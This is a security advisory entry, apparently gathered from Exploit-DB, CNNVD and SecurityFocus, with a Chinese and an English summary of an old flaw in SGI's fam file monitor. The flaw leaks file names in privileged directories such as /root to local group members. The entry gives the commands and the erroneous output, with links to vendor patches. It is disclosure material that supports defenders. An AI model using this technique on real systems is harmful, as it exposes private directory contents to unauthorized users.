https://www.exploit-db.com/exploits/21720
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200209-018

fam是一款由SGI开发和维护的开放源代码文件更改监视工具，也可以使用在其他Linux和Unix操作系统下。fam存在设计错误，本地攻击者可以利用这个漏洞获得高权限属主目录下的敏感文件名。当执行FAM对某一个目录进行监视时，对于只属于组成员的用户来说，本应该只会返回Exists和EndExist事件，如：#ls-ld/rootdrwxr-x—…rootroot…/root#fam%./test-d/rootFAMMonitorDirectory(“/root”)FAMMonitorDirectory(“/root”)DIR/root:/rootExistsDIR/root:/rootEndExist但是，由于设计错误，执行FAM的时候会返回如下信息：%./test-d/rootFAMMonitorDirectory(“/root”)FAMMonitorDirectory(“/root”)DIR/root:/rootExistsDIR/root:.gnomeExistsDIR/root:DesktopExists…导致泄露高权限目录中的敏感文件名。

source: http://www.securityfocus.com/bid/5487/info

fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems.

It is possible for a user to execute fam to discover a list of monitored files. This list, while it may have been created by a user of elevated privileges, could leak information to an attacker that may be sensitive. This vulnerability requires only that the directory being 'fammed' already have had the program executed against it by a privileged user.

# ls -ld /root
drwxr-x--- ... root root ... /root
# fam

% groups | grep root

ERRONEOUS BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: .gnome Exists
DIR /root: Desktop Exists
...

CORRECT BEHAVIOR
% ./test -d /root
FAMMonitorDirectory("/root")
FAMMonitorDirectory("/root")
DIR /root: /root Exists
DIR /root: /root EndExist
---------------------------------------- 
(% indicates a command run as an unprivileged user)

resource:
hyperlink:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02:05.asc
resource:
hyperlink:ftp://patches.sgi.com/support/free/security/advisories/20000301-03-I
resource:Patch
hyperlink:http://www.debian.org/security/2002/dsa-154
resource:
hyperlink:http://www.iss.net/security_center/static/9880.php
resource:
hyperlink:http://www.redhat.com/support/errata/RHSA-2005-005.html
resource:
hyperlink:http://www.securityfocus.com/bid/5487